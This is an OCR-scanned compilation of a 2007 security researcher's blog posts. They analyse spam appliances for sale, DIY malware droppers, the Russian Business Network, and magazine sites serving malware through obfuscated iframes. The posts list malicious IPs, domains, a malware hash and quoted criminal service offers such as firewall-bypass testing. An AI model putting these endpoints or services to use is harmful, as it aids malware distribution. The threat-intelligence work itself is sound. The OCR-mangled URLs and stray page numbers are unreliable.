and efficient spam, the whole routine in the most automated, 
the time our customers spend at statov refresh. 



However, if you or your staff would like to have enough 
knowledge to extract the maximum from their bots and 


bases, you have a beautiful high-tech istrument it may 
izmennie any settings. 


4. 

Business centers, skilled technical support. 

Complex program complex, which is fully explored - unique 

challenge, our support team will help you in any questions 
and solve any problems. 

5. Flexible pricing policy. Our command is spam many years 
in different directions, and our customers are 

top-sellerami many partnerships programs we are familiar 
with the process of naslyshke not spam. With this 

experience and knowledge, we do your business more stable 
and profitable. Our tariff plans: 

1-2 servers - $ 4000 per server 

3-5 servers - $ 3000 per server 

Let's summarize the key points : 

- a "spamming appliance" comes with 2500+ zombie bots, 
capable of sending 7000 emails per second 

- built-in verification for detection against common spam 
scoring systems 

- managed anti virus bypassing capabilities and signatures 
based detection 



- technical support 

What's next to come? Possibly a USB stick with built-in [4]C 
&C to a botnet with full admin rights. 

1. http://ddanchev.blo as pot.com/2007/Q9/spammers-and- 
phishers-breakin a -captchas.html 

2. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

3. http://ddanchev.blo as pot.com/20Q7/10/dvnamics-of- 
malware-industrv.html 
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4. http://ddanchev.blo as pot.com/2007/Q3/botnet- 
communication-platforms.html 

548 




The Global Security Challenge - 2007 (2007-10-15 
23:27) 

The [ 1 ]Global Security Challenge have [2]just announced the 
world's five most promising security startups chosen to 

compete at the GSC Final in London for a $500K grant this 
November. They are: 

- [3]Auxetix (UK) - fortifies protection against multiple 
explosions through helical-auxetic nets 

- [4]EyeMarker (USA) - scans the eye to rapidly and non- 
invasively assess a person's health 
























- [5]NoblePeak Vision (USA) - enabling the rapid detection 
and identification of people and objects at night 

without active illumination 

- [6]Psylock (Germany) - identifies users through biometric 
analysis of typing behavior 

- [7]XID Technology (Singapore) - face synthesis technology 
for real-time 3D rediction/replacement in a 2D 

video 

[8] Disintermediating the main sources of R &D with 

[9] innovation and cost-effectiveness in mind, is a business 

practice that's already embraced by numerous deep 
pocketed future clients interested in outsourcing innovation 
in 

the form of such contests. I'm particularly interested in 
Psylock's future development, and it's great to note that the 
folks behind this typing behavior authentication even set up 

[10] a demo of the concept. 

And given that [lljthe GSC are also embracing the 
blogosphere, let's wish them long-term passion and 
sustained 

professionalism in their initiative to fund promising security 
oriented startups. 

1. http://ddanchev.blo as pot.com/2006/05/ a lobal-securit v- 
challen a e-brin a- vour.html 

2. http://www. a lobalsecuritvchallen a e.com/ 

3. http://www.auxetic.co.uk/ 













4. http://www.evemarkersvstems.com/ 
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5. http://www.noblepeak.com/ 

6. http://www. ps vlock.com/ 

7. http://www.xidtech.com/ 

8. http://ddanchev.blo as pot.com/2007/Q5/disintermediatin a- 
ma i or-defense.html 

9. http://ddanchev.blo as pot.com/2006/Q4/spottin a -valuable- 
investments-in.html 


10. http://demo. os vlock.de/index. php? 
ClientA p plication=a98cb0aee4fl6dbc44d5b9c25cd4fcd3 

11. http:// a lobalsecuritvchallen a e2007.blo as oot.com/ 
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DIY German Malware Dropper (2007-10-16 15:58) 

Yet another publicly available DIY malware dropper this time 
courtesy of German compared to Russian malware 

crews, whose releases on the other hand are starting to live 
in a "high profit margins only" product/service business 
model, thus introducing [l]propriatery malware tools like the 
ones I've discussed in a previous post. Why would a 

malware crew member release such a tool for free? Respect, 
ego, quota of tools released to meet in order to remain 


























inside the team? Could be, but on several occasions such 
freely available tools get backdoored too, like just the 

source codes for popular malware kits. 

You often hear that [2]anti virus software is dead, that 
vendors end up their with quarters with meaningless 

percentage increases in every malware segment, 
meaningless in respect to the DIY trend. The idea has its pros 
and 

cons, no doubt about it, however it should orbit around 
different research questions such as : 

- which AVs are more ineffective, the ones which are not 
running due to the process list of each and every 

anti virus software now easily integrated within each and 
every malware dropper and malware tool in the wild? 

- or the ones whose often static update locations online get 
blocked by a malware in in order to prevent its 

detection supposedely to come in the next signatures 
update? 

Here're [3]related overviews of malware tools. 

1. http://ddanchev.blo as oot.com/20Q7/lQ/dvnamics-of- 
malware-industrv.html 

2. http://anti-virus-rants.blo as pot.com/20Q6/12/anti-virus-is- 
dead-not.html 

3. http://seclists.or a /fulldisclosure/2007/Au a /0411.html 
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Fast Fluxing Yet Another Pharmacy Scam (2007-10-16 
21:16) 

[l]Spam and phishing are indeed starting to operate behind 
the curtains of a fast-flux network of constantly changing 

IPs of malware infected PCs that end up hosting the scams 
and phishing pages themselves for a certain period of 

time. And I'm certain that's a trend and not a fad given the 
potential for increasing the average time a phishing or a 
scam site remains online, even the inability prove a certain IP 
was hosting it at a given period. 
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Take for instance the latest [2]Canadian Pharmacy spam 
campaign, where in between the fast-flux, they didn't even 

bother to register and use a legitimate SSL certificate, among 
the few visual proofs for the average end user that's 

ensuring a certain degree of security, yet, in order to 
establish more trust, dead link logos such as 11 Verified by 
Visa", 

" Secured by GeoTrust', " ScanAiert - Hacker Safe", and " 
Verisign" are included at the processing order page. To me, 
that's a typical [3]Rock Phish mentality - efficiency vs quality 
of the [4]phishing/scam campaign. The whole Canadian 

Pharmacy spam campaign is behind [5]an affiliate program 
forwarding the responsibility for promotion (spamming) 

and fast-fluxing, to the participants. 


1. http://ddanchev.blo as pot.com/2007/10/fast-f1ux-soam- 
and-scams-increasin a .html 


2. http://ddanchev.blo as pot.com/20Q7/10/love-is- 
ps vchedelic-too.html 

3. http://ddanchev.blo as pot.com/20Q7/10/assessin a -rock- 
phish-campai a n.html 

4. http://ddanchev.blo as pot.com/2007/09/2Q9-host- 
locked.html 

5. http://ddanchev.blo as pot.com/2007/10/incentives-model- 
for-oharmaceutical.html 
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MPack and IcePack Localized to Chinese (2007-10-16 
23:31) 

It is logical to consider the possibility that once a malware 
author starts evaluating [ 1 jthe benefits out of [2]releasing a 
malware in an open source form, malware exploitation kits 
can also build communities around them. Since August, 

2007, Chinese hacking groups can freely enjoy "the benefits" 
of [3]lcePack's and [4]MPack's malicious economies of scale 
attacking approach in the combination of a brain-damaging 
Keep It Simple Stupid exploitation tactic in the 

form of serving exploit URLs, which get [5]automatically 
embedded via a web application bug, or via [6]automated 

remote file inclusion enabled web site. 
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Let's once again emphasize on the research question of 

[7] wouldn't such malware kits and tools have a higher value 

if kept private, and why someone release them in the wild? 
Couple of months ago, the tools themselves were used 

as a bargain for improving the UVP (unique value 
proposition) on a large scale, that's of course until they 
became 

a commodity. From my perspective, all warfare is based on 
deception, especially infowar, namely, if the idea of 

embedding an exploiting serving URL at a popular site in 
order to infect all of its visits becomes a commodity as an 

attack tactic, at the end it will be the ones whose fast- 
fluxing, javascript obfuscation, and timely crypting and 
rotating the malware binary skills will put them in a market 
leader position, where the new entrants, the ones cheering 
for 

having access to such tools will make the headlines, like the 

[8] default malware kit installation wannabies they are. 
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By [9]ensuring that the market segment for malware in this 
case, has many participants and is not concentrated and 

operated by a few over-performing groups is a highly 
beneficial from the perspective of the most skilled and 
advanced 


groups continuing their operations in between the noise 
generated by the rest of market challengers. Now Playing in 

Cyberspace -" [10]The Revenge of the Chinese Script 
Kiddies". 

1. http://ddanchev.blo as pot.com/2007/09/custom-ddos- 
ca pabilities-within-malware.html 

2. http://ddanchev.blo as pot.com/2007/Q9/localizin a-o pen- 
source-malware.html 

3. http://ddanchev.blo as pot.com/2007/07/icepack-malware- 
kit-in-action.html 

4. http://ddanchev.blo as pot.com/2007/Q7/malware- 
embedded-sites-increasin a .html 

5. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

6. http://en.wikipedia.or a /wiki/Remote_File Inclusion 

7. http://ddanchev.blo as pot.com/20Q7/10/dvnamics-of- 
malware-industrv.html 

8. http://ddanchev.blo as pot.com/2007/Q9/ a oo a le-hackin a- 
for-mpacks-zunkers-and.html 

9. http://ddanchev.blo as pot.com/2007/Q3/under a round- 
economvs-su ppl v-of- a oods.html 

10. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
information-warfare-concept.html 
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Thousands of IM Screen Names in the Wild (2007-10- 
17 15:56) 

In the past, malware interested in establishing a one-to-one 
social engineering communication channel with potential 

victims, used to crawl the hard drive, even [l]the web 
address book of the infected party looking for emails to 

self-email the binary to. And with [2]the rise of instant 
messaging communications, malware authors adapted [3]old 

techniques such as [4]harvesting for emails to IM 
communications by introducing IM screen names harvesting 
and 

positioning the practice as both a product in the form of the 
segmented email databases of millions of emails already 

harvested, and as a service, by aggregating publicly 
available profile data to deliver targeted messages often 
[5]in 

the form of phishing, [6]malware embedded URLs, [7]and 
spam. Hitlist's based malware is nothing new, it's actually 

malware authors borrowing the spammers "direct marketing" 
communication model, and while you cannot change 

your email's account name unless of course you're [8]using a 
disposable or [9]temporary email service, you can 

easily, in fact periodically change your screen name. 
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IM networks are on the other hand, [10]slowly adopting a 
"save the world from the clicking crowd" security 

awareness model by blocking common malicious file and 
domain extensions, an initiative that's both applaudable 

and futile at the same time given the failure of URL filtering 
in today's dynamic and user-generated content Web. Go 

through [ll]an informative article by ScanSafe's Dan Nadir 
with comments on Signature-based detection, Heuristics, 

Code Analysis, Code reputation, URL Reputation, and Traffic 
Behavioral Analysis. 

1. http://ddanchev.blo as pot.com/2QQ6/Q6/web-a D Plication- 
email-harvestm a -worm.html 

2. http://ddanchev.blo as pot.com/2006/01/whats-potential-of- 
irn-securitv-market.html 

3. http://ddanchev.blo as pot.com/20Q7/01/inside-email- 
harvesters-confi a uratiQn.html 

4. http://ddanchev.blo as pot.com/2QQ6/Q9/email-spam- 
harvestin a -statistics.html 

5. http://computerworld.com/blo a s/node/6359 

6 . 

http://www.hindu.eom/thehindu/holnus/008200710160943.h 

tm 

7. http://ddanchev.blo as pot.com/2007/05/msn-spammin a- 
bot.html 


8. http://www.sizlopedia.com/2007/05/27/top-2Q-temporar v- 
and-disposable-email-services/ 



































9. http://www. a hacks.net/2007/05/28/list-of-20-temoorar v- 
email-services/ 

10. http://trac.adiumx.com/wiki/MSNCensorshi p 

11. http://www.scma a azineus.com/The-failure-of-URL- 
filterin a Hn-an-increasin al v-dan a erous-web-world/article/3 

5696/ 
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The Russian Business Network (2007-10-18 18:22) 

In case you haven't come across it before, here's an 
informative blog whose objective is to track events related to 
the 

[ljRussian Business Network (RBN) and expose its nodes in 
between : 

11 Everything you wanted to know about the RBN and related 
enterprises - AKA ; Russian Business Network, 

RBNnetwork, RBusinessNetwork; the Internet Community's 
favorite - exploiters, phishers, hacks, spammers, etc. " 

Under the pressure put by the "wisdom of crowds" collective 
intelligence capabilities in analyzing pieces of the puzzle 
who make up the big picture in respect to the [2]Russian 
Business Network, [3]a representative of the 

RBN speaks out for the first time : 

" We can't understand on which basis these organizations 
have such an opinion about our company," Tim Jaret of the 














Russian Business Network says in an e-mail interview. "We 
can say that this is subjective opinion based on these 
organizations' guesswork. "Jaret's e-mail signature identifies 
him as working in RBN's abuse department. 

Security researchers and anti-spam groups say the St. 
Petersburg-based RBN caters to the worst of the internet's 

scammers, renting them servers used for phishing and 
malware attacks, ail the while enjoying the protection of 

Russian government officials. A report by VeriSign called the 
business "entirely illegal. " 
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What is the RBN at the bottom line? A diversified set of IP 
blocks located at different parts of world, who periodically 
appear within the deobfuscated javascipts of the sites who 
got IFRAME-ed and were found to serve 

malware by exploiting outdated browser vulnerabilities. 
What's more interesting to me than the "yet another 

popular site which got IFRAME-ed by the RBN's network" is 
the success of the popular malware exploitating kits 

using outdated and already patched vulnerabilities. What 
use are patches when no one is applying them, and aren't 

unpatched vulnerabilities just as effective as zero day ones? 
Yes, they are. 

Issues to consider : 

- the RBN offers bullet proof hosting upon signing some sort 
of contract, where they may easily forward the 



responsibility to the hoster of the malware, phishing and 
spamming, namely, on a contract basis those hosting such 

content violate their TOS agreement, now whether or not the 
RBN will remove them in a self-regulation manner 

or wait for an abuse letter to come, then delay it for couple of 
weeks while the campaign is still active is entirely 

different topic 

- during the first couple of hours of the Bank of India hack, 
once vendors and researchers started assessing 

the site, the RBN IP that was used as redirector removed the 
javascript obfuscation and forwarded every visitor to 

Google.com. My point is that, unless real-time CYBERINT is 
collected by trusted parties, it would be very hard to 

come up with historical evidence on some of their malicious 
activities 

- despite being a consolidated organization offering bullet 
proof hosting, they're still not fast-fluxing any of 

their services on a large scale, an indication of a botnet 
behind the fast-flux, and while they're just a couple of 

netblocks to filter, it could get more ugly and harder to trace 
back. So let's "appreciate" the RBN's laziness for the time 
being 

- the RBN is the tip of the iceberg whose clients' successes in 
the form of embedding RBN IPs on the most re¬ 
cent malware cases led to the inevitable wisdom of crowds 
effect. What about the hundreds of thousands other not 



so well known malware serving netblocks? 

What were some of the most recent cases where RBN IPs 
were used to serve malware? The [4]Massive Em¬ 
bedded Web Attack in Italy used to orbit around RBN IPs, 
various other [5]exploits serving domains and the [6]fake 

ms-counter.com were using RBN IPs, [7]Bank of India's 
IFRAME and several [8]MPack control panels were pointing to 

RBN's network too, and also the most recent Beer.ch 
[9]malware attack. It gets even more interesting. 

Here are for instance some of the fake anti-virus and anti¬ 
spyware applications hosted at the Russian Busi¬ 
ness Network in the time of blogging. The applications 
are cute, little, tiny 35kb adwares : 

malwarealarm.com - active - Adware.Spysheriff 

xscanner.malwarealarm.com - active 

scanner.malwarealarm.com - active 

windowsafesurf.com - 403 forbidden 

spy-shredder.com - Adware.Spysheriff 

scanner.spy-shredder.com - active 

proantivirus.net - expired 

dragracers.biz - VirusBurst 

antivermins.com - Application.Antivermins.B / 
Virus.Win32.Spycrush.B 



adwareremover2007.com - Adware.Spysheriff 

The enemy you know is better than the enemy you don't 
know, but on a large scale I fear the enemy I don't 

know, namely the hundreds of thousands script kiddies now 
empowered with [10]open source and localized 
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malware kits. Here are [ll]two more related blog posts on 
[ 12]the RBN as well. 

1. http://rbnexploit.blo as pot.com/ 

2. http://en.wikipedia.or a /wiki/Russian_Business_Network 

3. 

http://www.wired.com/politics/securitv/news/2007/10/russian 

network 

4. http://ddanchev.blo as pot.com/2007/06/massive- 
embedded-web-attack~in-ilalv.html 

5. http://ddanchev.blo as pot.com/2007/06/exploits-servin a- 
domains.html 

6. http://ddanchev.blo as pot.com/2007/03/shots-from- 
malicious-wild-west-sample.html 

7. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

8. http://ddanchev.blo as pot.com/2007/Q9/ a oo a le-hackin a- 
for-mpacks-zunkers-and.html 

9. http://ddanchev.blo as pot.com/20Q7/10/compromised- 
sites-servin a -malware-and.html 






































10. http://ddanchev.blo as pot.com/20Q7/10/mpack-and- 
iceoack-localized-to-chinese.html 

11 . 

http://blo a .washin a tonpost.com/securitvfix/2007/10/ma ppin 

a _the_russian_business_n.html 

12 . 

http://blo a .washin a tonpost.com/securitvfix/2007/10/takin a o 
n the russian business.html 
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Sttpttmtbcr, 2007 


Everyone's Guide to By-Passing Internet Censorship 
(2007-10-19 13:58) 

Following the recently released "[l]Journey to the Heart of 
Internet Censorship" report, [2]University of Toronto's Citizen 
Lab took advantage of the momentum and released a guide 
entitled M [3]Everyone's Guide to By-Passing 


Internet Censorship" : 



" This guide is meant to introduce non-technical users to 
Internet censorship circumvention technologies, and help 
them choose which of them best suits their circumstances 
and needs. " Here's another interesting perspective that took 
event recently, the art of [4]using censorship for economic 
warfare by stealing Internet traffic from the U.S and 
forwarding the loyal visitors to local Internet properties in 
China : 

11 I've written previously on the possibility that China may use 
its firewall as an economic tool as opposed to a censorship 
too! alone, and although censorship may be partially behind 
todays blanket ban of US search sites, the 

redirect to Baidu would indicate an economic motive; if the 
Chinese Government were serious about censorship alone 
562 

we would have reports of page not found/ blocked messages, 
not redirects to Baidu. " 

[5]lt's all a matter of perspective - privacy is just as vital to 
maintain in a democratic society, as is anonymity 

in a modern communism societies where f*** speech is a 
censored word by itself. 

1. http://ddanchev.blo as pot.com/2007/10/ i ournev-to-heart- 
of-intemet-censorshio.html 

2. http://citizenlab.or a /modules. php? 
o p=modload&name=News&file=article&sid = 1319 

3. http://deibert.citizenlab.or a /Circ a uide.pdf 

4. http://www.techcrunch.com/2007/10/18/cvberwar-china- 
declares-war-on-western-search-sites/ 

















5. http://ddanchev.blo as pot.com/2006/01/anonvmitv-or- 
orivacv-on-internet.html 
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eCrime Researchers Summit 2007 - Papers Available 
(2007-10-19 15:09) 

Some informative papers covering various aspects of 
analyzing and protecting against phishing attacks were 
made 

available at the beginning of this month, courtesy of [ 1 ]this 
year's APWG eCrime Researchers Summit: 

" The Anti-Phishing Working Group eCrime Researchers 
Summit was conceived by APWG Secretary General Pe¬ 
ter Cassidy in 2006 as a comprehensive venue for the 
presentation of the state-of-the-art basic and applied 
research into electronic crime, engaging every aspect of its 
development (technical, behavioral, social and legal) as well 
as technologies and techniques for its detection, related 
forensics and its prevention. 11 

Papers presented include : 

- [2]Examining the Impact of Website Take-down on Phishing 

- [3]Fishing for Phishes: Applying Capture-Recapture to 
Phishing 

- [4]Evaluating a Trial Deployment of Password Re-use for 
Phishing Prevention 

- [5]Behavioral Response to Phishing Risk 








- [6]Fighting Obfuscated Spam 

- [7]A Comparison of Machine Learning Techniques for 
Phishing Detection 

- [8]Getting Users to Pay Attention to Anti-Phishing 
Education 

1. http://www.ecrimeresearch.or a /2007/pro a ram.html 

2 . 

http://www.ecrimeresearch.or a /2007/proceedin as/ pl_moore. 

pdf 

3. 

http://www.ecrimeresearch.or a /2007/proceedin as/ pl4 weave 
r.pdf 

4. 

http://www.ecrimeresearch.or g /2007/proceedin as/ p26 floren 
do. pdf 

5. 

http://www.ecrimeresearch.or a /2007/proceedin as/ p37_downs 

.pdf 

6 . 

http://www.ecrimeresearch.or a /2007/proceedin as/ p45_liu.pdf 

7. 

http://www.ecrimeresearch.or a /2007/proceedin as/ p60 abu- 
nimeh.pdf 

8 . 

http://www.ecrimeresearch.or a /2007/proceedin as/ p70 kumar 
aa uru.pdf 
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Random Flickr Jewel - Hold it Right There! (2007-10- 
20 22:41) 

[ 1 ] 

If you don't respect your privacy, or at least put efforts into 
preserving it - you don't deserve any, it's simple. [2]Great 
shot courtesy of [3]floze. 

1 . 

http://farm3.static.f1ickr.com/2322/1588186509 992632238 

9_.j pg ?v=1192557576 

2. http://f1ickr.com/photos/f1oze/1588186509/ 

3. http://f1ickr.com/photos/f1oze 
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China's Cyber Warriors - Video (2007-10-21 21:17) 

Originally aired on Discovery Channel, this [ljdocumentary 
on Chinese hackers is worth watching in the wake of the 

recent speculations of [2]Chinese cyber warriors probing the 
networks of numerous governments across the globe. 

All warfare is based on deception, especially [3]people's 
information warfare. 

1. http://video. a oo a le.com/videopla v? 
docid = 529232198501612 8434 


2. http://ddanchev.blo as pot.com/2007/Q9/chinas-cvber- 
es piona a e-ambitions.html 
















3. http://ddanchev.blo as pot.com/20Q7/10/peoples- 
information-warfare-concept.html 
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Empowering the Script Kiddies (2007-10-22 23:09) 

What are the chances tools like these, even this one in 
particular were distibuted to the masses during the [l]Russia 

vs Estonia DDoS attacks to achieve a full scale [2]people's 
information warfare effect? Too high not to state it as a 

fact. What's interesting about this tool is that the authors 
behind it backdoored it, and so whenever an enthusiastic 

wannabe hacktivist loads it on her way to DoS a site, a 
connection to a predefined IRC server opens up providing the 

authors behind the tool with access to the host. Ironic and 
[3]bandwidth greedy. 

DDoS attacks happen inside Russia too, compared to the 
inside-to-outside stereotype only. The most recent 

case of hacktivism in the form of a DDoS attack is for 
instance the attack on [4]Politcom.Ru Information and 
Analytic. 

Summary [5]in English : 

11 Politcom.Ru Information and Analytic site operations have 
been halted because of intensive DDoS-attacks. 

The attacks started on October, 12th and lasted for six days 
with various intensity The hosting support service has 








undertaken attempts to resume the site operations tree-four 
times a day. But in several hours the attacks would 

resume. The change of the hosting provider IP-address did 
not give any positive results, as the attacks removed from 
the old IP-address to the new one. 11 

1. http://www.imedialearn.com/imediapoll/pQll. php? 
code=f!156c39d3c972139c62bc91cl7e2c53 

2. http://ddanchev.blo as pot.com/2QQ7/10/peoples- 
information-warfare-concept.html 

3. http://ddanchev.blo as pot.com/2007/Q5/ddos-on-demand- 
vs-ddos-extortion.html 

4. http://politcom.ru/article. ph p7id = 5220 

5. http://en a .cnews.ru/news/line/indexEn.shtml? 
2007/10/18/271121 
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Introducing Jiglu - Tags That Think (2007-10-23 02:59) 

With the idea to make this blog easier to read and much 
more interactive at the same time, I'm happy to let you 

know that I've just tested an incredibly well performing 
service called [ljjiglu : 

11 a super-smart engine that pieces your site together, 
intelligently tagging and Unking your web content' 

Here's [2]the tag cloud, and these the [3 jtopic categories for 
easier navigation. 



















The service is very handy 

when browsing the archive of a specific month, or the main 
index itself, in fact, it's bringing new perspectives to 

every post. Enjoy! 

1. http:// iia lu.com/ 

2. http://ddanchevl-ta aaina.iia lu.com/ta a s/ioverla v 

3. http://ddanchevl-ta aaina.iia lu.com/ta a s/topics/ioverla v 
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Ain't That Ugly? (2007-10-23 03:52) 

During the weekend I stumbled upon a [ljherbal 
enlargement domains farm hosted on a single IP 
(210.52.223.26) 

on their way to start the spam campaign. Earlier this month, 
in exactly the same fashion I assessed [2]a Rock Phish 

domains farm you may also be interested in taking a look at. 
Scammy, scammy. 

1 . 

htt p://195.210.38.41:2082/file01/231007/1193105212/herb 

al spam domains.txt 

2. http://ddanchev.blo as pot.com/20Q7/10/assessin a -rock- 
phish-campai a n.html 
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RBN's Fake Security Software (2007-10-23 14:36) 


In need of a good example of coordinated [1]CYBERINT so 
that enough data is gathered before the domains stop 

responding or get transfered to a network not belonging to 
the Russian Business Network? Try this one. Yesterday, 

the [2]RBN monitoring blog picked up the [3]fake anti virus 
and spyware applications I covered in a previous post, and 
came up with a great table of [4]20 fake anti virus and anti 
spyware applications hosted at the RBN. 

1. http://ddanchev.blo as pot.com/2QQ6/Q9/cvber-intelli a ence- 
c vberint.html 

2. http://rbnexploit.blo as pot.com/ 

3. http://ddanchev.blo as pot.com/2QQ7/lQ/russian-business- 
network.html 

4. http://rbnexploit.blo as pot.com/2007/10/rbn-top-2Q-fake- 
anti-s p vware-and-anti.html 
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Over 100 Malwares Hosted on a Single RBN IP (2007- 
10-23 23:45) 

The never ending Russian Business Network's saga on 
whether or not they host malware on behalf of their 
customers 

enters in an entirely new phrase with the discovery of over 
100 malwares hosted on a single IP - 81.95.149.51/ms 



















where the directory listing indicates that the earliest binary 
was uploaded on 19-Sep-2006 and the most recent one 

on the 28-May-2007. If only was the directory listing denied 
we would only be speculating on such a development, 

and as it's obvious that it isn't sooner or later they'll simple 
rename the directory as they apparently did in the past from 

81.95.149.51/ms21 to 81.95.149.51/ms51 and to the 

current state. 

Meanwhile, there's an [l]active mass mailing campaign 
going on in the [2]time of blogging, that's ^exploit¬ 
ing the recent mailto PDF vulnerability. Guess where does the 
PDF file's payload point to? [4]The Russian Bussiness 

Network, again, again and again. 

1. http://blo a s.zdnet.com/securit v/? p = 605 

2. http://isc.sans.or a /diarv.html7storvid = 3537 

3. http://seclists.or a /fulldisclosure/2007/Qct/0730.html 

4. http://ddanchev.blo as pot.com/20Q7/10/russian-business- 
network.html 
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A Portfolio of Malware Embedded Magazines (2007- 
10-25 13:18) 

This is perhaps my most important discovery of [l]malware 
embedded sites farm in a while, at least in respect to the 














potential impact it is currently having on the unprotected 
visitors browsing the sites of Possibility Media's portfolio of 
online magazines, which are pretty weird content by 
themselves. Possibility Media's (now owned by GM Media 

Worldwide Inc.) 24 online publications are currently 
[2]serving embedded malware in the form of IFRAMEs on 
each 

and every domain, a logical development given they're all 
hosted on a single server (216.251.43.11). The affected 
domains include the following e-zines : 

572 




networkweekmag.com - Network Week Magazine 

portablecomputingmag.com - Portable Computing 
Magazine 

businesscomputingmagazine.com - Business Computing 
Magazine 

communicationsworldmag.com - Communications World 
Magazine 

spweekly.com - Service Provider Weekly 
webweekmag.com - Web Week Magazine 

pcnewsweeklymag.com - PC News Weekly 

itweekmagazine.com - IT Week Magazine 

communicationsweekmag.com - Communication Week 
Magazine 


ipworldmag.com - IP World Magazine 
networkweekmag.com - Network Week Magazine 

thebestpcmag.com - The Best PC 

technologyweekmag.com - Technology Week Magazine 

theinternetstandardmag.com - The Internet Standard 
securitystandardmag.com - Security Standard 
theitstandard.com - The IT Standard 
hostingweekmag.com - Hosting Week 
enterpriseweekmag.com - Enterprise Week 
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computernewsmagazine.com - Computer News 

theinternetstandardmag.com - The Internet Standard 

ceweekmag.com - CE Week Magazine 

ebusinessmag.com - Ebusiness Magazine 

healthcareitmagazine.com - Health Care IT Magazine 

serviceprovidermagazine.com - Service Provider 
Magazine 

Deobfuscating the obfuscated javascripts, we see that the 
first IFRAME points to : lilohost.hk/cgi/index.php ; 
lilohost.hk/cgi/indexx.php ; 

lilohost.hk/cgi/tdss/index.php?out=1192369270 ; and 


lilohost.hk/cgi/indexx.php - where we get the actual 
malware under the umbrella of a typical WebAttacker 
obfuscation. The main index of the domain 

includes links to pharmaceuticals, making it an interesting 
on in a combination with embedded malware. 

The second IFRAME points to 208.72.168.176/e- 
Srlpt2210/index.php where we're greeted with the 
following mes¬ 
sage 11 asdfasdflt works !" and [3]a piece of [4]Trojan.Srizbi. 
Detection rate : Result: 8/31 (25.81 %) 

File size: 113152 bytes 

MD5: a4733el901653da7086930588d699c85 

SHA1: 3e65be5e54b893cddf8f5f9bec2591425d49579a 

It gets even more interesting with the following domains 
returning the same message within their indexes, and also 

hosted at the second IFRAME-ing IP - 208.72.168.176. 
Possibility Media's vision states 11 New Media Making The 

Difference! 11 Indeed. 

Related posts: 

[5] Compromised Sites Serving Malware and Spam 

[6] Bank of India Serving Malware 

[7] U.S Consulate in St.Petersburg Serving Malware 

[8] Syrian Embassy in London Serving Malware 
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[9]CISRT Serving Malware 

1. http://ddanchev.blQ as pot.com/2007/07/malware- 
embedded-sites-increasin a .html 

2. http://ddanchev.blo as pot.com/2007/Q9/ po pular-web- 
malware-exploitation.html 

3. http://richi.co.uk/blo a /2007/07/srizbi-spam-botds-nastier- 
than-we.html 


4. http://www.svmantec.com/securitv_response/writeu p.isp? 
docid = 2007-062007-0946-99 

5. http://ddanchev.blo as pot.com/2007/10/compromised- 
sites-servin a -malware-and.html 

6. http://ddanchev.blo as pot.com/2007/Q8/bank-of-india- 
servin a -malware.html 

7. http://ddanchev.blo as pot.com/2007/Q9/us-consulate-st- 
petersbur a -servin g .html 

8. http://ddanchev.blo as pot.com/2007/09/svrian-embassv-in- 
london-servin a .html 

9. http://ddanchev.blo as pot.com/20Q7/10/cisrt-servin a- 
malware.html 
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Multiple Firewalls Bypassing Verification on Demand 
(2007-10-29 13:46) 











































Next to the [l]proprietary malware tools, [2]malware as a 
web service, [3]Shark2's built-in VirusTotal submission, the 
numerous [4]malware crypting on demand services, the 
complete outsourcing of spam in the form of a M [5]managed 

spamming appliance", and the built-in [6]firewalI and anti 
virus killing capabilities in commodity DIY malware 

droppers, all indicate that the dynamics of the malware 
industry are once again shifting towards a service based 

economy with a recently offered multiple firewall bypassing 
verification on demand service. The following is an 

automatically translated excerpt: 

11 Here are a new feature-check your files against popular 
firewalls. You send us a file, we run it in each individual 
fayrvole, after full you personal checking account. The cost 
of single use service is $3. A special service for developers, 
we check your software and your otpisyvaemsya subject to 
the results of the verification. File of our 

service to circumvent firewalls. The cost of the service so far 
is no different from the usual check. Testing takes about 
30/40 minutes, the countdown begins once you responded 
Support "Doc passed ordering" Every fifth-free ordering. 

When paying full use prepaid services. Do not worry about 
sending stay online, with a corresponding demand will 

be organized kurglosutochnaya work 24/7/365! List of our 
firewalls at the moment: ZoneAlarm Pro v7.0; Sygate 

Personal Firewall 5.5; Ashampoo Fire Wall PRO; Sunbelt 
Personal Firewall; Outpost Internet Security 2008; Filseclab 



Personal Firewall Professional Edition; F-Secure Internet 
Security 2008; Comodo Firewall Pro. 


Every feature is installed on a separate Windows XP Service 
PAck2, with all the critical updates for September 

2007. AH default. After each check ail operatsionki regress 
back to the condition it was prior to the launch your 
executable file. None of the transferred files, we will not be 
forwarded to third parties, including anti-virus companies, 
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to study the existence of malicious code. After verifying the 
files removed. Now the service does not work in the 
automatic mode, not around the dock, with breaks. We 
would be happy to cooperate and permanent clients. " 

Basically, they're testing whether or not a malware will 
"phone back home" by running it against the popular firewall 
products, and giving it a green or red light if it does, or if it 
does not pass the test. QA is vital to reliable and bug-free 
software, but when QA as a concept starts getting abused to 
improve the quality of a malware campaign 

itself it would improve its chances for success, and actually 
achive it given a bypassing confirmation is already 

anticipated. 

Is this [7]malware QA a trend, or is it a fad? I think it's a trend 
mostly because malware authors seem to have 

realized the potential of launching "quality assured 
malware", take [8]storm worm for [9]instance, and the 
possibility for [10]crunching out DIY malware through 
commodity kits in enormous quantities in the form of a 
managed malware 



provider. 

1. http://ddanchev.blo as DOt.com/20Q7/10/dvnamics-of- 
malware-industrv.html 

2. http://ddanchev.blo as pot.com/2007/Q8/malware-as-web- 
service.html 

3. http://ddanchev.blo as pot.com/2007/Q8/rats-or- 
malware.html 

4. http://seclists.or a /fulldisclosure/2007/Au a /0411.html 

5. http://ddanchev.blo as pot.com/20Q7/10/mana a ed- 
s pammin a-ap pliances-future-of.html 

6. http://ddanchev.blo as pot.com/2007/10/di v-a erman- 
malware-dro p per.html 

7. 

http://www.windowsecuritv.eom/uplarticle/networksecuritv/m 

alware-trends.pdf 

8. http://ddanchev.blo as pot.com/2007/Q8/storm-worm- 
malware-back- in-a ame.html 

9. http://ddanchev.blo as pot.com/2007/Q9/storm-worms-fast- 
f1ux-networks.html 


10. http://ddanchev.blo as pot.com/20Q7/10/mpack-and- 
icepack-localized-to-chinese.html 
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Wisdom of the Anti Cyber Jihadist Crowd (2007-10-29 
18:36) 









































Interesting [l]opinion by Gerald at the [2]lnternet 
Anthropologist Warintel blog : 

11 And I want to call this the "Brilliant civilian sector". It 
included the likes of Bill Roggio, Dancho Danchev, Dou-glas 
